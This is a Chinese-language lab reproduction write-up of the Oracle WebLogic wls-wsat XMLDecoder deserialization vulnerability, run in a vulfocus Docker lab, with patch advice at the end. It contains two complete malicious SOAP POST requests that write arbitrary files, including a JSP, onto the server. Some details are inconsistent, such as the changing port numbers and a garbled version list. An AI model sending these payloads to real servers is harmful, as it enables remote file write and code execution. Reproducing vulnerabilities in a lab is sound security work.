漏洞名称

漏洞描述

在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0（Application Server Soft ware）中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。

影响版本

Oracle Weblogic_Server 12.2.1.1.0
Oracle Weblogic_Server 10.3.6.0.0
Oracle Weblogic_Server 12.1.3.0.0
Oracle Weblogic_Server 12.2.1.2.0

漏洞复现

环境搭建

受害者IP：192.168.63.129:53342
攻击者IP：192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d 

环境启动后，访问http://192.168.63.129:53342即可看到一个404页面，说明已成功启动。
漏洞的URL

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1

访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。

漏洞利用

上传test.txt文件尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

访问URL：http://192.168.63.129:57677/wls-wsat/test.txt
上传test.jsp尝试一下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[ <% out.print("test"); %> ]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

访问路径：http://192.168.63.129:57677/bea_wls_internal/test.jsp

修复建议

目前官方已有可更新版本，建议受影响用户升级至最新版本。
补丁链接：http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html